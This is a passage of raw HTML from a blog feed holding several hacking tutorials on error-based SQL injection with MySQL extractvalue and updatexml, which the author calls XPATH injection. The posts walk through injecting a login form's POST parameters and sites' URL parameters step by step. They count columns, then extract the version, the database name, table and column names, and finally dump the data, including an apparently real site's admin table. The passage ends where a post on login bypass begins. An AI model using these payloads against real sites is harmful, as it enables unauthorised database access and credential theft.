<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now open LIVE HTTP HEADERS in Mozilla Firefox .As You Can See there are <b>username </b>and <b>password</b> Boxes in Admin Login Panel.Insert Some Text there and Click On <b>Log In</b> Button.</span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioi94-uy7yAAVzdqjNpAP0w-LrSJuFGcgl1iTTnydCgFO-gxA3AKVpwI6tsyTeUf-B94Zj3aY05mAIGaNlw9s-cSmh2zK4zYNA6FdMkeCzgN5waym-ESsMimHYac6UA9hh2vbVbdySliC8/s1600/XPATH+Injection+in+Login+Panel+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioi94-uy7yAAVzdqjNpAP0w-LrSJuFGcgl1iTTnydCgFO-gxA3AKVpwI6tsyTeUf-B94Zj3aY05mAIGaNlw9s-cSmh2zK4zYNA6FdMkeCzgN5waym-ESsMimHYac6UA9hh2vbVbdySliC8/s400/XPATH+Injection+in+Login+Panel+1.png" title="XPATH Injection in Login Panel" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"> After Clicking On the <b>Log In</b> Button, Now search the Post Parameters in Live HTTP HEADERS.Here are our Post Request that we have sent to the server. </span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVLybk2LWKEIowFqIlkRe5HWgu5xlkGaDT5oO_C3KFpnmmoK86Xn2WjBADcFxyQBA6KJhBzxXtsNPY4eVT5WF7qFoA5YvCltSHBLwwinCOalhXabBiAIFagqEzGRFMnhv5zxgMPSr78g_/s1600/XPATH+Injection+in+Login+Panel+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEVLybk2LWKEIowFqIlkRe5HWgu5xlkGaDT5oO_C3KFpnmmoK86Xn2WjBADcFxyQBA6KJhBzxXtsNPY4eVT5WF7qFoA5YvCltSHBLwwinCOalhXabBiAIFagqEzGRFMnhv5zxgMPSr78g_/s400/XPATH+Injection+in+Login+Panel+3.png" title="XPATH Injection in Login Panel" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">From The Above Picture You Can See these are our Post Request Parameters</span><br />
<span style="font-size: small;"><b>POST REQUEST:<span style="color: red;">user_id=raijee&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;">Now let's Add Single Quote ' after <b><span style="color: red;">user_id=raijee' </span></b><span style="color: red;"><span style="color: black;">to check if the Login Panel is Vulnerable to SQL Injection</span></span><span style="color: red;"><span style="color: black;">.After Adding The Single Quote ' in Our Query Let's Send A POST Request to The Server And Click on REPLY Button. </span></span></span><br />
<span style="color: red; font-size: small;"><span style="color: black;">So After sending the POST Request to The Server it gives SQL Error !!</span></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41s4ehStIvsxeiQPnWO_lVv7EQhmu8E_38yDc4eRyuKyS0iBEBg_hATt-uJ1zl0f8E-akkx2h9sEUXllKkG-PSDbFldIuq6lPbgfuSHupbmx219tj5L3Br3cMdsOdaiZV8BUGgNU4r0eR/s1600/XPATH+Injection+in+Login+Panel+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg41s4ehStIvsxeiQPnWO_lVv7EQhmu8E_38yDc4eRyuKyS0iBEBg_hATt-uJ1zl0f8E-akkx2h9sEUXllKkG-PSDbFldIuq6lPbgfuSHupbmx219tj5L3Br3cMdsOdaiZV8BUGgNU4r0eR/s400/XPATH+Injection+in+Login+Panel+4.png" title="XPATH Injection in Login Panel" width="400" /></a></span></div>
<span style="color: black; font-size: small;">it Means it's Vulnerable to SQL Injection.Let's count The columns for Preparing Our UNION BASED command.so now we will Give our POST Request to the Server for Counting the number of Columns there.</span><br />
<span style="color: red; font-size: small;"><span style="color: black;">So this one is Our POST Parameter Now Add Order By Command For Counting columns:</span></span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><b>POST REQUEST<span style="color: red;"><span style="color: black;">:</span></span></b></span></span><span style="font-size: small;"><b><span style="color: red;">user_id=raijee' order by 2%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;"><span style="color: red;"><span style="color: black;"> <b>it Gives No any Error !!</b></span></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: red; font-size: small;"><span style="color: black;"><b>POST REQUEST<span style="color: red;"><span style="color: black;">:</span></span></b></span></span><span style="font-size: small;"><b><span style="color: red;">user_id=raijee' order by 5%23&password=12345&submit=Sign+In</span></b></span><br />
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;">Again No Error !!</span></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' order by 6%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><b><span style="color: red;"> </span></b></span></span></b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">Here we Got Error !!</span></span></span></span></span><br />
<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: black; font-size: small;"><span style="color: black;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgwl4QcXXdoLPh3U1-24PaAPxfFpbDSviuNuQCaN_h3CQBl2V1Q49isA5f6w7hrVlYCfJ1iN2A8b5MoSZQM3N8jQD6BlPsblYls4lyS7QRdMs-1qT3s-3yeQyLrB5RmS8mGhEd9gI3ncc/s1600/XPATH+Injection+in+Login+Panel+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXgwl4QcXXdoLPh3U1-24PaAPxfFpbDSviuNuQCaN_h3CQBl2V1Q49isA5f6w7hrVlYCfJ1iN2A8b5MoSZQM3N8jQD6BlPsblYls4lyS7QRdMs-1qT3s-3yeQyLrB5RmS8mGhEd9gI3ncc/s400/XPATH+Injection+in+Login+Panel+5.png" title="XPATH Injection in Login Panel" width="400" /></a></span></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">Error:</span></span></span></span></b><span style="color: red;">Invalid query:Unknown column '6' in 'order clause</span>'</span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;">so it mean there are 5 Total Columns. Now Let's Prepare our UNION BASED command and Send a POST Request to the Server:</span></span></span></span><br />
<!-- adsense -->
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;"> </span></span></span></span><span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><br /></span></span></span><br />
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' and 0 union select 1,2,3,4,5%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;">But It doesn't Give us Any Output There.So now Let's Try XPATH Injection for injecting it.</span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;">So This is our XPATH query for version.You Can use XPATH with Extractvalue or UpdateXML. </span></span></span></span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;">Let's Send a Post Request for getting the VERSION With XPATH</span></span></span></span><span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;"> Injection</span></span></span></span> by Extractvalue .</span></span></span></span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;"><br /></span></span></span></span>
<br />
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' and<span style="color: black;"> </span>extractvalue(0x3a,concat(0x3a,version()))%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;"><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">Here we Got The</span></span></span></span><b><span style="color: red;"><span style="color: black;"><b><span style="color: red;"><span style="color: black;"> VERSION.</span> </span></b></span></span></b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><b><span style="color: black;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueDk3uDFOtIaPrcrHv597O3WwBzS_OdPmkkTkQpBt7SUd-ZbxfgMy1AHLXDakZhJpSiUNjMPhmocuyIDC67Zu8IT1vvLXPEDwd3FiU_lD1NOW7p3_QkFcisVhoWjs3u_w9FDhrQUHAGgJ/s1600/XPATH+Injection+in+Login+Panel+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection in Login Panel" border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueDk3uDFOtIaPrcrHv597O3WwBzS_OdPmkkTkQpBt7SUd-ZbxfgMy1AHLXDakZhJpSiUNjMPhmocuyIDC67Zu8IT1vvLXPEDwd3FiU_lD1NOW7p3_QkFcisVhoWjs3u_w9FDhrQUHAGgJ/s400/XPATH+Injection+in+Login+Panel+6.png" title="XPATH Injection in Login Panel" width="400" /></a></b></span></b></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Invalid query:XPATH syntax error: ':<span style="color: red;">5.5.32-log</span>'</span><br />
<span style="font-size: small;">So now next we Have To Get the Tables from the Database.Here is The Query for Tables and Send a Post Request.</span><br />
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' </span></b></span></span></b><b><span style="color: red;"><span style="color: black;"><b><span style="color: red;"><b>and extractvalue(0x3a,concat(0x3a,(select
concat(table_name) from information_schema.tables where
table_schema=database() limit 0,1)))</b>%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;">Increase the LIMIT for other Tables.After Getting the Tables Next part is to Getting the columns from The Tables.So This one is our Query:</span></span></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' </span></b></span></span></b><b><span style="color: red;"><span style="color: black;"><b><span style="color: red;"><b>and extractvalue(0x3a,concat(0x3a,(select
concat(column_name) from information_schema.columns where
table_name='<span style="color: blue;">TABLE_NAME_HERE</span>' limit 0,1)))</b>%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><b><span style="color: red;"> </span></b></span></span></b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">After Getting The Columns From the Tables</span></span></span></span><b><span style="color: red;"><span style="color: black;"><b><span style="color: red;"><span style="color: black;"> </span></span></b></span></span></b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">Now </span></span></span></span><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">Final Part is Dump Data from the Columns.</span></span></span></span></span><br />
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;">So This one is FINAL QUERY:</span></span></span></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">POST REQUEST<b><span style="color: red;"><span style="color: black;">:</span></span></b></span></span><b><span style="color: red;">user_id=raijee' </span></b></span></span></b><b><span style="color: red;"><span style="color: black;"><b><span style="color: red;"><b>and extractvalue(0x3a,concat(0x3a,(select
concat(<span style="color: blue;">COLUMN</span></b></span></b></span></span><span style="color: blue;">_NAME_HERE</span><span style="color: red;"><span style="color: black;"><b><span style="color: red;"><b>) from<span style="color: black;"> <span style="color: blue;">TABLE_NAME_HERE</span></span>)))</b>%23&password=12345&submit=Sign+In</span></b></span></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><span style="color: red;"><span style="color: black;"><span style="color: red;"><span style="color: black;">If you have not Read Tutorials About XPATH Injection then First Go And Read </span></span></span></span></span><br />
<span style="font-size: small;"><b><span style="color: blue;"><a href="http://www.raijee1337.blogspot.com/2015/07/xpath-injection-using-extractvalue.html" target="_blank">XPATH Injection Using Extractvalue</a></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: blue;"><a href="http://www.raijee1337.blogspot.com/2015/07/xpath-injection-using-extractvalue.html" target="_blank">XPATH Injection Using UpdateXML</a></span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="color: red; font-size: small;"><span style="color: black;"><span style="color: red;"><span style="color: black;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </span></span></span></span><br />
<span style="font-size: small;"><br /></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com2tag:blogger.com,1999:blog-5545325473666478334.post-52295479917924773622015-07-15T09:53:00.000-07:002015-08-17T08:51:09.296-07:00XPATH Injection Using UPDATEXML<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQuw1vrGS90nrXLrGIcAaMwgZsiPt7OueFIX8ehK5VD5-laPeoxxxvutCAjQ9oQLxIP5q2cKv3EEJxsMv-X1frrOagzJ2z8f4nA9Vcf8IlYJZbAVH0IAaI0XOHOvmecqSFOeDJN1rEp7E/s1600/XPATH+Injection+Using+updatexml+www.raijee1337.blogspot.com+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using UPDATEXML" border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdQuw1vrGS90nrXLrGIcAaMwgZsiPt7OueFIX8ehK5VD5-laPeoxxxvutCAjQ9oQLxIP5q2cKv3EEJxsMv-X1frrOagzJ2z8f4nA9Vcf8IlYJZbAVH0IAaI0XOHOvmecqSFOeDJN1rEp7E/s320/XPATH+Injection+Using+updatexml+www.raijee1337.blogspot.com+tutorial.png" title="XPATH Injection Using UPDATEXML" width="320" /></a></span></div>
<span style="font-size: small;">After the Discussion About <a href="http://raijee1337.blogspot.com/2015/07/xpath-injection-using-extractvalue.html" target="_blank">XPATH Injection Using ExtractValue</a></span><br />
<span style="font-size: small;">Now Let's come to the Next Part. in This Tutorial you Will Learn About XPATH Injection Using UPDATEXML .</span><br />
<span style="font-size: small;">Each Site use Different Firewalls To Protect their Databases.in XPATH injection Some sites use UPDATEXML and they have Block The ExtractValue Function.So we can use there XPATH Injection With UPADTEXML.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Let's Start Our Injecting Manually.We are injecting A Site and Then we Execute our UNION BASED Query But we Do not Get Any OutPut There so We Will use There XPATH Injection.</span><br />
<span style="font-size: small;">For Example here is our UNION BASED Query. </span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and 0 Union Select 1,2,3,4,5-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After Executing This Query we Do not Get any OUTPUT or Sometimes we Got This Type OF Error</span><br />
<span style="font-size: small;">"The used SELECT statements have a different number of columns"</span><br />
<span style="font-size: small;">so we will Use There XPATH Injection for injecting the DATABASE</span><br />
<span style="font-size: small;">So let's try To Get The Version Using XPATH Injection With UPDATEXML query.</span><br />
<span style="font-size: small;">our XPATH Query will be:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,version()),null)-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>After Executing The Query we Got this Type of Output :</span><br />
<span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;"><b>XPATH syntax error: ':<span style="color: red;">VERSION_HERE</span>'</b></span><br />
<!-- adsense -->
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">So now Let's Check The Current Database Name<b> </b>and Our Query for Getting The Current Database Will be:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"> <b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,database()),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">and we Got This Output:<b> </b></span><br />
<span style="font-size: small;"><b>XPATH syntax error: ':<span style="color: red;">CURRENT_DATABASE_NAME_HERE</span>'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Let's Continue our Injecting to Getting The Tables in the Current Database.</span><br />
<span style="font-size: small;">So This one Will be Our Query for the Tables<b>:</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">And After Executing The Query we Will Got This output<b>:</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>XPATH syntax error: ':<span style="color: red;">SOME_TABLE_NAME_HERE</span>'</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">as we are injecting with XPATH injection<b> </b>so we will increase the LIMIT for getting other Tables in the current Database.</span><br />
<span style="font-size: small;">So After Getting the Tables From the current Database Our Next Step is to get The COLUMNS From TABLES.</span><br />
<span style="font-size: small;">And our Query for Getting Columns Will be:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and
updatexml(null,concat(0x3a3a,(select concat(column_name) from
information_schema.columns where table_name=<span style="color: red;">'OUR_TABLE_NAME_HERE'</span> limit 0,1)),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">we will Increase the Limit for getting Other columns in the <b>Targeted Table.</b></span><br />
<span style="font-size: small;">So After Getting The columns FINAL PART is to dump Data from the columns.</span><br />
<span style="font-size: small;">And Our FINAL Query will be :</span><br />
<span style="font-size: small;"><b>http://www.VulnSite.com/news.php?id=6 and
updatexml(null,concat(0x3a3a,(select concat(<span style="color: red;">OUR_COLUMN_NAME_HERE</span>) from<span style="color: red;"> OUR_TABLE_NAME_HERE</span>)),null)-- -</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: #783f04;">HAP</span><span style="color: #e06666;">PY</span> <span style="color: #93c47d;">INJ</span><span style="color: #ead1dc;">ECT</span><span style="color: #134f5c;">ING !!!</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="color: #134f5c;">AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><br /></b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com0tag:blogger.com,1999:blog-5545325473666478334.post-27166050643978527022015-07-14T10:35:00.001-07:002015-08-17T08:49:15.434-07:00XPATH Injection Using Extractvalue<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM83KkkWkxx-7NH_gH6Pe8KUbB9pGm22q6siEXNIPNxPHwVT1KNb3k6oDUE73BUYVc72BNWMLWQmXccbsJM96jPtgJT92JgrIQ5_-UrHH7of0WiYtlGc8hR9NgSl0lxaG2rEvzeuy5PjGt/s1600/XPATH+Injection+Using+Extractvalue+www.raijee1337.blogspot.com+tutorial.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM83KkkWkxx-7NH_gH6Pe8KUbB9pGm22q6siEXNIPNxPHwVT1KNb3k6oDUE73BUYVc72BNWMLWQmXccbsJM96jPtgJT92JgrIQ5_-UrHH7of0WiYtlGc8hR9NgSl0lxaG2rEvzeuy5PjGt/s320/XPATH+Injection+Using+Extractvalue+www.raijee1337.blogspot.com+tutorial.png" title="XPATH Injection Using Extractvalue" width="320" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><br /></span></div>
<span style="font-size: small;">In This Tutorial we will Discuss about XPATH Injection Using Extractvalue</span><br />
<span style="font-size: small;">While We are injecting a Site and Then Come to the UNION BASED part .When we Execute Union Based Query meanwhile we Got There a ERROR Message</span><br />
<span style="font-size: small;">"The used SELECT statements have a different number of columns"</span><br />
<span style="font-size: small;">so we Used There XPATH injection.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">let's Start Our XPATH Injection.</span><br />
<span style="font-size: small;">Here is a Target Let's Find The Version with XPATH</span><br />
<span style="font-size: small;">So here is our Query for Finding The Version in XPATH</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,version()))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">let's execute this Query in our Target Site.</span><br />
<!-- adsense -->
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,version()))-- -</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqDlXtrF4SrWglvoUPxyz8CINfD9xdKhvXqVXnhH-g8XFs5dtDUwIq_j3C1cjdu5OnABB-w2lw0q0bTmEPkMKTO4oGpdl0p6bLDLr_v6hzs-L30p0QlQj5pDixttW4V7WhmSZSot8e_aBk/s1600/XPATH+Injection+Using+Extractvalue+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqDlXtrF4SrWglvoUPxyz8CINfD9xdKhvXqVXnhH-g8XFs5dtDUwIq_j3C1cjdu5OnABB-w2lw0q0bTmEPkMKTO4oGpdl0p6bLDLr_v6hzs-L30p0QlQj5pDixttW4V7WhmSZSot8e_aBk/s400/XPATH+Injection+Using+Extractvalue+1.png" title="XPATH Injection Using Extractvalue" width="400" /></a></span></div>
<span style="font-size: small;">So this is The Version:<b>XPATH syntax error: ':5.5.42-37.1-log'</b></span><br />
<span style="font-size: small;">now Let's check The Current Database name There.<b> </b></span><br />
<span style="font-size: small;"><b><br /></b>
Here is the Query for finding the current Database name</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,database()))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Execute this Query in our Target Site.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1 and extractvalue(0x3a,concat(0x3a,database()))-- -</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6LwmFs_b6TWVhu2aMTS_8GGM3taxk3_iI_jJnSFOtzPTVzJFjvyoqz5JGg8PJQIb_lEbbwdltfH7uXO9NVugcC4urOyLOGQjLkaeori_QGPALAd81w7EuSbt69KvxtC_tId4PwfXaDM-p/s1600/XPATH+Injection+Using+Extractvalue+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6LwmFs_b6TWVhu2aMTS_8GGM3taxk3_iI_jJnSFOtzPTVzJFjvyoqz5JGg8PJQIb_lEbbwdltfH7uXO9NVugcC4urOyLOGQjLkaeori_QGPALAd81w7EuSbt69KvxtC_tId4PwfXaDM-p/s400/XPATH+Injection+Using+Extractvalue+2.png" title="XPATH Injection Using Extractvalue" width="400" /></a></span></div>
<span style="font-size: small;">This is The Current Database name:<b> XPATH syntax error: ':dealitea_dealiteasy'</b></span><br />
<span style="font-size: small;">Now Let's move on to our Further injecting <b>.</b></span><br />
<span style="font-size: small;">Next is to finding The table names from the database<b>.</b></span><br />
<span style="font-size: small;">Here is The Query for Finding the Table Name.</span><br />
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database())))</b></span><br />
<span style="font-size: small;">as we are injecting in XPATH so there we cant get all the tables .so we need to add LIMIT in our query to get The Tables One by One.</span><br />
<span style="font-size: small;">So let's Add LIMIT in our Query.</span><br />
<span style="font-size: small;"><b>XPATH QUERY: and extractvalue(0x3a,concat(0x3a,(select
concat(table_name) from information_schema.tables where
table_schema=database() limit 0,1)))</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">Now Execute this Query in Target Site For Finding The tables</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1 </b><b><b>and extractvalue(0x3a,concat(0x3a,(select
concat(table_name) from information_schema.tables where
table_schema=database() limit 0,1)))</b>-- - </b></span><br />
<span style="font-size: small;">Increase<b> </b>the limit to get other tables in the current Database.</span><br />
<span style="font-size: small;">Here we got the Table of Admin</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgraZriSfHR5N_CrzkAtqWN7mVPNQI1Vqp_fwJLZy6lPg_oHpmiDdkco-xSyAu2mgNYwSFtEbO_ykKtMlvYhivPPHEzW2TEqhTdohqHNqcJzKYKgtncmsN5X-9Dt_gedXnu-cdtu757iNwF/s1600/XPATH+Injection+Using+Extractvalue+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="XPATH Injection Using Extractvalue" border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgraZriSfHR5N_CrzkAtqWN7mVPNQI1Vqp_fwJLZy6lPg_oHpmiDdkco-xSyAu2mgNYwSFtEbO_ykKtMlvYhivPPHEzW2TEqhTdohqHNqcJzKYKgtncmsN5X-9Dt_gedXnu-cdtu757iNwF/s400/XPATH+Injection+Using+Extractvalue+3.png" title="XPATH Injection Using Extractvalue" width="400" /></a></span></div>
<span style="font-size: small;">Let's get the Columns from This Table:<b> XPATH syntax error: ':deal_admin'</b></span><br />
<span style="font-size: small;">Here is our query for Getting Columns from the table.<b> </b></span><br />
<span style="font-size: small;"><b>XPATH QUERY:</b></span><br />
<span style="font-size: small;"><b><b>and extractvalue(0x3a,concat(0x3a,(select
concat(column_name) from information_schema.columns where
table_name=OUR_TABLE_NAME_HERE limit 0,1)))</b>--</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">We Execute this query for Getting The Columns.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.TARGETSITE.com/detail.php?id=1</b><b><b> and extractvalue(0x3a,concat(0x3a,(select
concat(column_name) from information_schema.columns where
table_name=OUR_TABLE_NAME_HERE limit 0,1)))</b>-- -</b></span><br />
<span style="font-size: small;"><b><br /></b>
Increase the limit for other Columns in the Table.</span><br />
<span style="font-size: small;">And The Final Part is to Extracting Data from The Columns.</span><br />
<span style="font-size: small;">So Here is our Final Query.</span><br />
<span style="font-size: small;"><b>XPATH QUERY:</b> <b><b>and extractvalue(0x3a,concat(0x3a,(select
concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))</b>-- -</b></span><br />
<span style="font-size: small;">Execute this Query in the Target Site for Extracting data of Columns From the Target Table.<b> </b></span><br />
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com1tag:blogger.com,1999:blog-5545325473666478334.post-46734631388307770242015-07-12T10:15:00.000-07:002015-08-17T08:47:11.499-07:00Bypassing Login Panel with SQL Queries<span style="font-size: small;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
